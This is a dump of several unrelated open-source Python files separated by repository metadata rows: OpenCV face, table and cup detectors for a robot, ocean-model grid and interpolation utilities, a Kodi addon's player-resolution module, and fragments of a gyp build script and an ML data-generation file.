if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return path
def _InstallableTargetInstallPath(self):
"""Returns the location of the final output for an installable target."""
# Xcode puts shared_library results into PRODUCT_DIR, and some gyp files
# rely on this. Emulate this behavior for mac.
if (self.type == 'shared_library' and
(self.flavor != 'mac' or self.toolset != 'target')):
# Install all shared libs into a common directory (per toolset) for
# convenient access with LD_LIBRARY_PATH.
return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias)
return '$(builddir)/' + self.alias
| apache-2.0 | 6,971,785,228,950,044,000 | 42.240822 | 167 | 0.633817 | false | 3.852302 | true | false | false |
rolisz/walter_waiter | sensors/webcam.py | 1 | 7932 | import numpy as np
import itertools
import cv2
from time import sleep
import os
import math
import event
from color_matcher import ColorMatcher
from sensors.sift_matcher import SIFTMatcher
from pixels2coords import pixels2coords, get_distance_from_cup_width
def distance_between_faces(face1, face2):
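    """
    Euclidean distance between the centers of two face bounding boxes,
    e.g. 20x20 boxes at (0, 0) and (30, 40) are 50 px apart:
    >>> distance_between_faces((0, 0, 20, 20), (30, 40, 20, 20))
    50.0
    """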
x1, y1, w1, h1 = face1
x2, y2, w2, h2 = face2
return math.sqrt((x1 + w1/2.0 - x2 - w2/2.0)**2 +
(y1 + h1/2.0 - y2 - h2/2.0)**2)
def distance_to_center(face, size=(640, 480)):
"""
    Get the distance from the center of the face's bounding box to the center of
the image.
>>> distance_to_center((270, 200, 20, 20))
50.0
>>> distance_to_center((310, 230, 20, 20))
0.0
>>> distance_to_center((310, 230, 20, 20), (1024, 768))
240.0
"""
x, y, w, h = face
c_x, c_y = x+w/2.0, y+h/2.0
return math.sqrt((c_x - size[0]/2.0)**2+(c_y - size[1]/2.0)**2)
def common_area(face1, face2):
"""
Calculate the percentage of common area for two bounding boxes. Should be 0
for completely different bounding boxes, 1 for the same.
>>> common_area((100, 200, 300, 400), (100, 200, 300, 400))
1.0
>>> common_area((1, 2, 3, 4), (6, 7, 8, 9))
0.0
>>> common_area((100, 100, 100, 100), (150, 100, 100, 100))
0.5
>>> round(common_area((100, 100, 100, 100), (150, 100, 100, 200)), 4)
0.3333
"""
area = (face1[2]*face1[3] + face2[2]*face2[3])/2.0
left = max(face1[0], face2[0])
right = min(face1[0] + face1[2], face2[0]+face2[2])
top = max(face1[1], face2[1])
bottom = min(face1[1]+face1[3], face2[1]+face2[3])
if left < right and top < bottom:
return (right - left)*(bottom-top)/area
return 0.0
class Webcam(event.EventEmitter):
def __init__(self, ev, cam):
self.cap = cv2.VideoCapture(cam)
self.cap.set(3, 1280)
self.cap.set(4, 720)
super(Webcam, self).__init__(ev)
def run(self):
while self.run_flag.is_set():
_, frame = self.cap.read()
self.emit('frame', frame)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
sleep(0.1)
cv2.destroyAllWindows()
self.cap.release()
MAX_ITER = 15
class FaceDetector(event.DecisionMaker):
def __init__(self, ev):
self.i = MAX_ITER
# If this script doesn't work, first check if the paths to the Haar
# cascades are correct. By default they work on my computer.
        # On other computers they can be overridden by setting the env
        # variables FACE_HAAR and PROFILE_HAAR to the appropriate values.
#
self.face = None
self.face_cascade = cv2.CascadeClassifier(os.getenv('FACE_HAAR',
'haarcascades/haarcascade_frontalface_default.xml'
))
self.profile_cascade = cv2.CascadeClassifier(os.getenv('PROFILE_HAAR',
"haarcascades/haarcascade_profileface.xml"
))
super(FaceDetector, self).__init__(ev)
def frame(self, frame):
frame = cv2.resize(frame, None, fx=0.5, fy=0.5,
interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = list(self.face_cascade.detectMultiScale(gray, 1.3, 5))
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
if len(faces):
distances = sorted([(face, distance_to_center(face,
(1280, 1024))) for face in faces],
key=lambda x: x[0][2]*x[0][3]) # Area of face
if self.face is None:
self.face, self.d_c = distances[-1]
else:
distances.sort(key=lambda x: distance_between_faces(x[0],
self.face))
if distance_between_faces(self.face, distances[0][0]) < 50:
self.face, self.d_c = distances[0]
else:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
self.sleep(0)
cv2.imshow('faces', frame)
return
self.emit('face_pos', tuple(x*2 for x in self.face))
x, y, w, h = self.face
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow('faces', frame)
self.i = MAX_ITER
elif self.face is not None:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
cv2.imshow('faces', frame)
self.sleep(0)
class TableDetector(event.DecisionMaker):
def __init__(self, ev):
self.ev = ev
self.table_matcher = SIFTMatcher(templ='haarcascades/table.png', min_match_count=20)
super(TableDetector, self).__init__(ev)
def frame(self, frame):
height, width = frame.shape[:2]
frame = cv2.resize(frame, (3*width/4, 3*height/4))
result = self.table_matcher.find_match(frame)
if result is not None:
kp2, matchesMask, dst, good, dst_pts = result
else:
cv2.imshow('frame', frame)
self.sleep(0)
return
frame = cv2.polylines(frame,[np.int32(dst)],True, 255)
cv2.imshow('Table detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
self.emit('table_pos', dst)
self.sleep(0)
class CupDetector(event.DecisionMaker):
def __init__(self, ev, cam_angle, cup_color='pahar_mare_albastru'):
self.frames_seen = 0
self.cam_angle = cam_angle
self.cup_color = cup_color
self.blue_cup = ColorMatcher(cup_color)
self.ev = ev
super(CupDetector, self).__init__(ev)
def frame(self, frame):
big_contours = self.blue_cup.find_bboxes(frame)
contours = []
for contour in big_contours:
x, y, X, Y = contour
ratio = float(Y-y)/(X-x+1)
contours.append((x, y, X, Y, 1, 1.2))
for x, y, X, Y in big_contours:
ratio = float(Y-y)/(X-x+1)
cv2.rectangle(frame, (x-2, y-2), (X, Y), (255, 0, 0), 2)
cv2.putText(frame, '%0.3f' % ratio, (x, y+20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
coords_list = []
for x, y, X, Y, matches, ratio in contours:
cv2.rectangle(frame, (x - 2, y - 2), (X, Y), (0, 255, 0), 2)
dist = '%0.2f' % get_distance_from_cup_width(X-x)
coords = pixels2coords((x+X)/2., Y-(X-x), X-x,
cam_angle=self.cam_angle)
cv2.putText(frame, dist, (x, y-20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
cv2.putText(frame, '%0.2f %0.2f %0.2f' % coords, (x, y-50),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255),
thickness=2)
if x > 0 and X < frame.shape[1]:
coords_list.append(coords)
coords_list.sort()
for x, y, z in coords_list:
self.frames_seen = min(self.frames_seen + 1, 20)
if self.frames_seen == 20 and x < 400:
                print('cd: Cup appeared: %s' % self.cup_color)
self.emit('cup_appeared', (x, y, z))
self.frames_seen = 0
break
#else:
#print 'cd: Cups done: %s' % self.cup_color
#self.emit('cups_done')
cv2.imshow('Cup detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
| mit | -6,352,059,488,724,073,000 | 34.253333 | 92 | 0.51122 | false | 3.25082 | false | false | false |
dionhaefner/veros | veros/tools/setup.py | 1 | 17459 | import numpy as np
import scipy.interpolate
import scipy.spatial
def interpolate(coords, var, interp_coords, missing_value=None, fill=True, kind='linear'):
"""Interpolate globally defined data to a different (regular) grid.
Arguments:
coords: Tuple of coordinate arrays for each dimension.
var (:obj:`ndarray` of dim (nx1, ..., nxd)): Variable data to interpolate.
interp_coords: Tuple of coordinate arrays to interpolate to.
missing_value (optional): Value denoting cells of missing data in ``var``.
Is replaced by `NaN` before interpolating. Defaults to `None`, which means
no replacement is taking place.
fill (bool, optional): Whether `NaN` values should be replaced by the nearest
finite value after interpolating. Defaults to ``True``.
kind (str, optional): Order of interpolation. Supported are `nearest` and
`linear` (default).
Returns:
:obj:`ndarray` containing the interpolated values on the grid spanned by
``interp_coords``.
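    Example:
        Interpolate a global field defined on coordinate arrays ``lon`` and ``lat``
        onto a finer grid (array names and shapes are illustrative):
        >>> field.shape
        (360, 180)
        >>> fine_lon = np.linspace(0.25, 359.75, 720)
        >>> fine_lat = np.linspace(-89.75, 89.75, 360)
        >>> out = interpolate((lon, lat), field, (fine_lon, fine_lat))
        >>> out.shape
        (720, 360)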
"""
if len(coords) != len(interp_coords) or len(coords) != var.ndim:
raise ValueError('Dimensions of coordinates and values do not match')
var = np.array(var)
if missing_value is not None:
invalid_mask = np.isclose(var, missing_value)
var[invalid_mask] = np.nan
if var.ndim > 1 and coords[0].ndim == 1:
interp_grid = np.rollaxis(np.array(np.meshgrid(
*interp_coords, indexing='ij', copy=False)), 0, len(interp_coords) + 1)
else:
interp_grid = coords
var = scipy.interpolate.interpn(coords, var, interp_grid,
bounds_error=False, fill_value=np.nan, method=kind)
if fill:
var = fill_holes(var)
return var
def fill_holes(data):
"""A simple inpainting function that replaces NaN values in `data` with the
nearest finite value.
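    Example (illustrative):
        >>> fill_holes(np.array([1., np.nan, 3.])).tolist()
        [1.0, 3.0, 3.0]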
"""
data = data.copy()
shape = data.shape
dim = data.ndim
flag = np.zeros(shape, dtype=bool)
flag[~np.isnan(data)] = True
slcs = [slice(None)] * dim
while np.any(~flag):
for i in range(dim):
slcs1 = slcs[:]
slcs2 = slcs[:]
slcs1[i] = slice(0, -1)
slcs2[i] = slice(1, None)
slcs1 = tuple(slcs1)
slcs2 = tuple(slcs2)
# replace from the right
repmask = np.logical_and(~flag[slcs1], flag[slcs2])
data[slcs1][repmask] = data[slcs2][repmask]
flag[slcs1][repmask] = True
# replace from the left
repmask = np.logical_and(~flag[slcs2], flag[slcs1])
data[slcs2][repmask] = data[slcs1][repmask]
flag[slcs2][repmask] = True
return data
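# Hedged illustration (editorial addition): a tiny 1-D array with a single NaN,
# chosen only to show that missing values are copied from a neighbouring finite
# cell (the right-hand neighbour is tried first).
#
#   >>> fill_holes(np.array([1., np.nan, 3.]))   # -> array([1., 3., 3.])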
def get_periodic_interval(current_time, cycle_length, rec_spacing, n_rec):
"""Used for linear interpolation between periodic time intervals.
One common application is the interpolation of external forcings that are defined
at discrete times (e.g. one value per month of a standard year) to the current
time step.
Arguments:
current_time (float): Time to interpolate to.
cycle_length (float): Total length of one periodic cycle.
rec_spacing (float): Time spacing between each data record.
n_rec (int): Total number of records available.
Returns:
:obj:`tuple` containing (n1, f1), (n2, f2): Indices and weights for the interpolated
record array.
Example:
The following interpolates a record array ``data`` containing 12 monthly values
to the current time step:
>>> year_in_seconds = 60. * 60. * 24. * 365.
>>> current_time = 60. * 60. * 24. * 45. # mid-february
>>> print(data.shape)
(360, 180, 12)
>>> (n1, f1), (n2, f2) = get_periodic_interval(current_time, year_in_seconds, year_in_seconds / 12, 12)
>>> data_at_current_time = f1 * data[..., n1] + f2 * data[..., n2]
"""
locTime = current_time - rec_spacing * 0.5 + \
cycle_length * (2 - round(current_time / cycle_length))
tmpTime = locTime % cycle_length
tRec1 = 1 + int(tmpTime / rec_spacing)
tRec2 = 1 + tRec1 % int(n_rec)
wght2 = (tmpTime - rec_spacing * (tRec1 - 1)) / rec_spacing
wght1 = 1.0 - wght2
return (tRec1 - 1, wght1), (tRec2 - 1, wght2)
def make_cyclic(longitude, array=None, wrap=360.):
"""Create a cyclic version of a longitude array and (optionally) another array.
Arguments:
longitude (ndarray): Longitude array of shape (nlon, ...).
array (ndarray): Another array that is to be made cyclic of shape (nlon, ...).
wrap (float): Wrapping value, defaults to 360 (degrees).
Returns:
Tuple containing (cyclic_longitudes, cyclic_array) if `array` is given, otherwise
just the ndarray cyclic_longitudes of shape (2 * nlon, ...).
"""
lonsize = longitude.shape[0]
cyclic_longitudes = np.hstack((longitude[lonsize//2:, ...] - wrap, longitude, longitude[:lonsize//2, ...] + wrap))
if array is None:
return cyclic_longitudes
cyclic_array = np.hstack((array[lonsize//2:, ...], array, array[:lonsize//2, ...]))
return cyclic_longitudes, cyclic_array
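# Hedged usage sketch (editorial addition): the longitude values are illustrative.
#
#   >>> lon = np.array([0., 90., 180., 270.])
#   >>> make_cyclic(lon)                       # shape (8,), wrapped by +/- 360 degrees
#   >>> lon_c, sst_c = make_cyclic(lon, sst)   # 'sst' is a hypothetical (4, ...) field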
def get_coastline_distance(coords, coast_mask, spherical=False, radius=None, num_candidates=None, n_jobs=-1):
"""Calculate the (approximate) distance of each water cell from the nearest coastline.
Arguments:
coords (tuple of ndarrays): Tuple containing x and y (longitude and latitude)
coordinate arrays of shape (nx, ny).
coast_mask (ndarray): Boolean mask indicating whether a cell is a land cell
(must be same shape as coordinate arrays).
spherical (bool): Use spherical instead of Cartesian coordinates.
When this is `True`, cyclical boundary conditions are used, and the
resulting distances are only approximate. Cells are pre-sorted by
Euclidean lon-lat distance, and great circle distances are calculated for
the first `num_candidates` elements. Defaults to `False`.
radius (float): Radius of spherical coordinate system. Must be given when
`spherical` is `True`.
num_candidates (int): Number of candidates to calculate great circle distances
            for each water cell. The higher this value, the more accurate the returned
distances become when `spherical` is `True`. Defaults to the square root
of the number of coastal cells.
n_jobs (int): Number of parallel jobs to determine nearest neighbors
(defaults to -1, which uses all available threads).
Returns:
:obj:`ndarray` of shape (nx, ny) indicating the distance to the nearest land
cell (0 if cell is land).
Example:
The following returns coastal distances of all T cells for a spherical Veros setup.
>>> coords = np.meshgrid(self.xt[2:-2], self.yt[2:-2], indexing='ij')
>>> dist = tools.get_coastline_distance(coords, self.kbot > 0, spherical=True, radius=self.radius)
"""
if not len(coords) == 2:
raise ValueError('coords must be lon-lat tuple')
if not all(c.shape == coast_mask.shape for c in coords):
raise ValueError('coordinates must have same shape as coastal mask')
if spherical and not radius:
raise ValueError('radius must be given for spherical coordinates')
watercoords = np.array([c[~coast_mask] for c in coords]).T
if spherical:
coastcoords = np.array(make_cyclic(coords[0][coast_mask], coords[1][coast_mask])).T
else:
coastcoords = np.array((coords[0][coast_mask], coords[1][coast_mask])).T
coast_kdtree = scipy.spatial.cKDTree(coastcoords)
distance = np.zeros(coords[0].shape)
if spherical:
def spherical_distance(coords1, coords2):
"""Calculate great circle distance from latitude and longitude"""
coords1 *= np.pi / 180.
coords2 *= np.pi / 180.
lon1, lon2, lat1, lat2 = coords1[..., 0], coords2[..., 0], coords1[..., 1], coords2[..., 1]
return radius * np.arccos(np.sin(lat1) * np.sin(lat2) + np.cos(lat1) * np.cos(lat2) * np.cos(lon1 - lon2))
if not num_candidates:
num_candidates = int(np.sqrt(np.count_nonzero(~coast_mask)))
i_nearest = coast_kdtree.query(watercoords, k=num_candidates, n_jobs=n_jobs)[1]
approx_nearest = coastcoords[i_nearest]
distance[~coast_mask] = np.min(spherical_distance(approx_nearest, watercoords[..., np.newaxis, :]), axis=-1)
else:
distance[~coast_mask] = coast_kdtree.query(watercoords, n_jobs=n_jobs)[0]
return distance
def get_uniform_grid_steps(total_length, stepsize):
"""Get uniform grid step sizes in an interval.
Arguments:
total_length (float): total length of the resulting grid
stepsize (float): grid step size
Returns:
:obj:`ndarray` of grid steps
Example:
        >>> uniform_steps = get_uniform_grid_steps(6., 0.25)
>>> uniform_steps
[ 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25 ]
"""
if total_length % stepsize:
raise ValueError('total length must be an integer multiple of stepsize')
return stepsize * np.ones(int(total_length / stepsize))
def get_stretched_grid_steps(n_cells, total_length, minimum_stepsize, stretching_factor=2.5,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using a hyperbolic tangent stretching function.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
minimum_stepsize (float): Grid step size on the lower end of the interval.
stretching_factor (float, optional): Coefficient of the `tanh` stretching
function. The higher this value, the more abrupt the step sizes change.
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Examples:
>>> dyt = get_stretched_grid_steps(14, 180, 5)
>>> dyt
[ 5.10517337 5.22522948 5.47813251 5.99673813 7.00386752
8.76808565 11.36450896 14.34977676 16.94620006 18.71041819
19.71754758 20.2361532 20.48905624 20.60911234]
>>> dyt.sum()
180.0
>>> dyt = get_stretched_grid_steps(14, 180, 5, stretching_factor=4.)
>>> dyt
[ 5.00526979 5.01802837 5.06155549 5.20877528 5.69251688
7.14225176 10.51307232 15.20121339 18.57203395 20.02176884
20.50551044 20.65273022 20.69625734 20.70901593]
>>> dyt.sum()
180.0
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
            raise ValueError('number of grid points must be an even integer (given: {})'.format(n_cells))
        n_cells = n_cells // 2
stretching_function = np.tanh(stretching_factor * np.linspace(-1, 1, n_cells))
if refine_towards == 'lower':
stretching_function = stretching_function[::-1]
if two_sided_grid:
stretching_function = np.concatenate((stretching_function[::-1], stretching_function))
def normalize_sum(var, sum_value, minimum_value=0.):
if abs(var.sum()) < 1e-5:
var += 1
var *= (sum_value - len(var) * minimum_value) / var.sum()
return var + minimum_value
stretching_function = normalize_sum(stretching_function, total_length, minimum_stepsize)
assert abs(1 - np.sum(stretching_function) / total_length) < 1e-5, 'precision error'
return stretching_function
def get_vinokur_grid_steps(n_cells, total_length, lower_stepsize, upper_stepsize=None,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using Vinokur stretching.
This stretching function minimizes discretization errors on finite difference
grids.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
lower_stepsize (float): Grid step size on the lower end of the interval.
upper_stepsize (float or ``None``, optional): Grid step size on the upper end of the interval.
If not given, the one-sided version of the algorithm is used (that enforces zero curvature
on the upper end).
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Reference:
Vinokur, Marcel, On One-Dimensional Stretching Functions for Finite-Difference Calculations,
Journal of Computational Physics. 50, 215, 1983.
Examples:
>>> dyt = get_vinokur_grid_steps(14, 180, 5, two_sided_grid=True)
>>> dyt
[ 18.2451554 17.23915939 15.43744632 13.17358802 10.78720589
8.53852027 6.57892471 6.57892471 8.53852027 10.78720589
13.17358802 15.43744632 17.23915939 18.2451554 ]
>>> dyt.sum()
180.
>>> dyt = get_vinokur_grid_steps(14, 180, 5, upper_stepsize=10)
>>> dyt
[ 5.9818365 7.3645667 8.92544833 10.61326984 12.33841985
13.97292695 15.36197306 16.3485688 16.80714121 16.67536919
15.97141714 14.78881918 13.27136448 11.57887877 ]
>>> dyt.sum()
180.
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be an even integer (given: {})'.format(n_cells))
n_cells = n_cells // 2
n_cells += 1
def approximate_sinc_inverse(y):
"""Approximate inverse of sin(y) / y"""
if y < 0.26938972:
inv = np.pi * (1 - y + y**2 - (1 + np.pi**2 / 6) * y**3 + 6.794732 * y**4 - 13.205501 * y**5 + 11.726095 * y**6)
else:
ybar = 1. - y
inv = np.sqrt(6 * ybar) * (1 + .15 * ybar + 0.057321429 * ybar**2 + 0.048774238 * ybar**3 - 0.053337753 * ybar**4 + 0.075845134 * ybar**5)
assert abs(1 - np.sin(inv) / inv / y) < 1e-2, 'precision error'
return inv
def approximate_sinhc_inverse(y):
"""Approximate inverse of sinh(y) / y"""
if y < 2.7829681:
ybar = y - 1.
inv = np.sqrt(6 * ybar) * (1 - 0.15 * ybar + 0.057321429 * ybar**2 - 0.024907295 * ybar**3 + 0.0077424461 * ybar**4 - 0.0010794123 * ybar**5)
else:
v = np.log(y)
w = 1. / y - 0.028527431
inv = v + (1 + 1. / v) * np.log(2 * v) - 0.02041793 + 0.24902722 * w + 1.9496443 * w**2 - 2.6294547 * w**3 + 8.56795911 * w**4
assert abs(1 - np.sinh(inv) / inv / y) < 1e-2, 'precision error'
return inv
target_sum = total_length
if two_sided_grid:
target_sum *= .5
s0 = float(target_sum) / float(lower_stepsize * n_cells)
if upper_stepsize:
s1 = float(target_sum) / float(upper_stepsize * n_cells)
a, b = np.sqrt(s1 / s0), np.sqrt(s1 * s0)
if b > 1:
stretching_factor = approximate_sinhc_inverse(b)
stretched_grid = .5 + .5 * np.tanh(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tanh(.5 * stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(b)
stretched_grid = .5 + .5 * np.tan(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tan(.5 * stretching_factor)
stretched_grid = stretched_grid / (a + (1. - a) * stretched_grid)
else:
if s0 > 1:
stretching_factor = approximate_sinhc_inverse(s0) * .5
stretched_grid = 1 + np.tanh(stretching_factor * np.linspace(0., 1., n_cells)) / np.tanh(stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(s0) * .5
stretched_grid = 1 + np.tan(stretching_factor * np.linspace(0., 1., n_cells)) / np.tan(stretching_factor)
stretched_grid_steps = np.diff(stretched_grid * target_sum)
if refine_towards == 'upper':
stretched_grid_steps = stretched_grid_steps[::-1]
if two_sided_grid:
stretched_grid_steps = np.concatenate((stretched_grid_steps[::-1], stretched_grid_steps))
assert abs(1 - np.sum(stretched_grid_steps) / total_length) < 1e-5, 'precision error'
return stretched_grid_steps
| mit | 149,458,022,250,451,620 | 42.538653 | 153 | 0.616817 | false | 3.428712 | false | false | false |
TheWardoctor/Wardoctors-repo | plugin.video.metalliq/resources/lib/meta/play/base.py | 1 | 9730 | import sys, os
import json
from traceback import print_exc
from xbmcswift2 import xbmc, xbmcgui, xbmcplugin
from meta import plugin
from meta.gui import dialogs
from meta.utils.executor import execute
from meta.utils.properties import set_property
from meta.utils.text import to_unicode, urlencode_path, apply_parameters, to_utf8
from meta.library.tools import get_movie_from_library, get_episode_from_library
from meta.navigation.base import get_icon_path, get_background_path
from meta.play.players import get_players, patch
from meta.play.channelers import get_channelers
from meta.play.lister import Lister
from settings import *
from language import get_string as _
@plugin.cached(TTL=60, cache="trakt")
def get_trakt_ids(*args, **kwargs):
try:
from trakt import trakt
return trakt.find_trakt_ids(*args, **kwargs)
except: return None
def active_players(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_PLAYERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_PLAYERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_PLAYERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_PLAYERS
elif media == "live": setting = SETTING_LIVE_ENABLED_PLAYERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_players(media, filters) if p.id in enabled]
def active_channelers(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_CHANNELERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_CHANNELERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_CHANNELERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_CHANNELERS
elif media == "live": setting = SETTING_LIVE_ENABLED_CHANNELERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_channelers(media, filters) if p.id in enabled]
def action_cancel(clear_playlist=True):
if clear_playlist: xbmc.PlayList(xbmc.PLAYLIST_VIDEO).clear()
plugin.set_resolved_url()
xbmc.executebuiltin('Dialog.Close(okdialog, true)')
def action_activate(link):
xbmc.executebuiltin('Container.Update("%s")' % link)
#action_cancel()
def action_run(link):
if link.startswith("plugin://"): xbmc.executebuiltin('RunPlugin(%s)' % link)
else: xbmc.executebuiltin('RunScript(%s)' % link)
def action_prerun(link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
xbmc.executebuiltin('Container.Update("%s")' % link)
def action_play(item):
#action_cancel()
plugin.play_video(item)
def action_playmedia(item):
xbmc.executebuiltin('PlayMedia("%s")'%item)
def action_resolve(item):
#plugin.set_resolved_url(item)
action_play(item)
def get_video_link(players, params, mode, use_simple=False):
lister = Lister()
# Extend parameters
for lang, lang_params in params.items():
for key, value in lang_params.items():
if isinstance(value, basestring):
params[lang][key + "_+"] = value.replace(" ", "+")
params[lang][key + "_-"] = value.replace(" ", "-")
params[lang][key + "_escaped"] = value.replace(" ", "%2520")
params[lang][key + "_escaped+"] = value.replace(" ", "%252B")
pDialog = None
selection = None
try:
if len(players) > 1 and use_simple:
index = dialogs.select(_("Play using..."), [player.title for player in players])
if index == -1: return None
players = [players[index]]
resolve_f = lambda p : resolve_player(p, lister, params)
if len(players) > 1:
pool_size = plugin.get_setting(SETTING_POOL_SIZE, int)
populator = lambda : execute(resolve_f, players, lister.stop_flag, pool_size)
selection = dialogs.select_ext(_("Play using..."), populator, len(players))
else:
result = resolve_f(players[0])
if result:
title, links = result
if len(links) == 1: selection = links[0]
else:
index = dialogs.select(_("Play using..."), [x['label'] for x in links])
if index > -1: selection = links[index]
else: dialogs.ok(_("Error"), _("%s not found") % _("Video"))
finally: lister.stop()
return selection
def on_play_video(mode, players, params, trakt_ids=None):
if plugin.get_setting(SETTING_AUTOPATCH, bool) == True: patch("auto")
assert players
# Cancel resolve
action_cancel()
# Get video link
use_simple_selector = plugin.get_setting(SETTING_USE_SIMPLE_SELECTOR, bool)
is_extended = not (use_simple_selector or len(players) == 1)
if not is_extended: xbmc.executebuiltin("ActivateWindow(busydialog)")
try: selection = get_video_link(players, params, mode, use_simple_selector)
finally:
if not is_extended: xbmc.executebuiltin("Dialog.Close(busydialog)")
if not selection: return
# Get selection details
link = selection['path']
action = selection.get('action', '')
plugin.log.info('Playing url: %s' % to_utf8(link))
# Activate link
if action == "ACTIVATE": action_activate(link)
elif action == "RUN": action_run(link)
elif action == "PRERUN": action_prerun(link)
elif action == "PLAYMEDIA": action_playmedia(link)
elif action == "PRERUNRETURN": metaplayer().action_prerun(link)
else:
if trakt_ids: set_property('script.trakt.ids', json.dumps(trakt_ids))
return link
return None
def resolve_player(player, lister, params):
results = []
for command_group in player.commands:
if xbmc.abortRequested or not lister.is_active(): return
command_group_results = []
for command in command_group:
if xbmc.abortRequested or not lister.is_active(): return
lang = command.get("language", "en")
if not lang in params: continue
parameters = params[lang]
try:
link = apply_parameters(to_unicode(command["link"]), parameters)
except:
print_exc()
continue
if link == "movies" and player.media == "movies":
video = get_movie_from_library(parameters['imdb'])
if video:
command_group_results.append(video)
elif link == "tvshows" and player.media == "tvshows":
video = get_episode_from_library(parameters['id'], parameters['season'], parameters['episode'])
if not video:
video = get_episode_from_library(parameters['tmdb'], parameters['season'], parameters['episode'])
if video:
command_group_results.append(video)
elif not command.get("steps"):
command_group_results.append(
{
'label': player.title,
'path': urlencode_path(link),
'action': command.get("action", "PLAY")
}
)
else:
steps = [to_unicode(step) for step in command["steps"]]
files, dirs = lister.get(link, steps, parameters)
if command.get("action", "PLAY") == "ACTIVATE":
files += dirs
if files:
command_group_results += [
{
'label': f['label'],
'path': player.postprocess(f['path']),
'action': command.get("action", "PLAY")
} for f in files]
if command_group_results:
break
results += command_group_results
if results:
return player.title, results
class metaplayer(xbmc.Player):
def __init__(self):
xbmc.Player.__init__(self)
self.returnlink = xbmc.getInfoLabel('Container.FolderPath')
xbmc.log("returnlink: " + repr(self.returnlink), xbmc.LOGNOTICE)
def action_prerun(self, link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
self.play(link)
while xbmc.getInfoLabel('Container.PluginName') == id[2] and xbmc.getInfoLabel('Container.FolderPath') != "plugin://%s/" % id[2] and id[2] in xbmc.getInfoLabel('Container.FolderPath'):
xbmc.sleep(250)
if xbmc.getInfoLabel('Container.FolderPath') == "plugin://%s/" % id[2] or id[2] not in xbmc.getInfoLabel('Container.FolderPath'):
break
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackEnded(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackStopped(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink) | apache-2.0 | 8,459,668,550,241,768,000 | 43.43379 | 192 | 0.613155 | false | 3.868787 | false | false | false |
sameersingh/ml-discussions | week3/mltools/datagen.py | 1 | 4211 | import numpy as np
from numpy import loadtxt as loadtxt
from numpy import asarray as arr
from numpy import asmatrix as mat
from numpy import atleast_2d as twod
from scipy.linalg import sqrtm
################################################################################
## Methods for creating / sampling synthetic datasets ##########################
################################################################################
